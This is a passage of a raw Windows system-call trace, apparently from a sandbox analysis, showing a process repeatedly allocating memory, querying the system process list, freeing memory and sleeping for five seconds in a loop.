ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.912] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.933] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.974] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.993] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.031] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 